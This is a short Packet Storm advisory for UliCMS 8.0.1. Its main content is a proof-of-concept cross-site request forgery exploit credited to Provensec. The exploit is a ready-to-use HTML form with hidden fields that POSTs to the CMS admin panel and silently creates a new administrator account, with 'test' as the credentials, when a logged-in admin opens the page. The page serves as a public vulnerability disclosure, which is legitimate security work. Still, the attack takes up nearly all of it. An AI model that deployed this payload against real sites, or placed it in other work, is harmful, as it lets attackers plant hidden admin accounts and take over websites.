UliCMS version 8.0.1 suffers from a cross site request forgery vulnerability.
9b42b7b4b12fd9108033bbc04bd7fa32db25cdc43e93fe2f55e9ff51410b41ca# Affected software: UliCMS 8.0.1
# Type of vulnerability: admin add exploit (csrf)
# URL: http://en.ulicms.de/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version 8.0.1
# Proof of concept
<html>
<body>
<form action="
http://demo.opensourcecms.com/ulicms/admin/index.php?action=admins"
method="POST">
<input type="hidden" name="add_admin" value="add_admin" />
<input type="hidden" name="admin_username" value="test" />
<input type="hidden" name="admin_lastname" value="test" />
<input type="hidden" name="admin_firstname" value="test" />
<input type="hidden" name="admin_email" value="test" />
<input type="hidden" name="admin_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed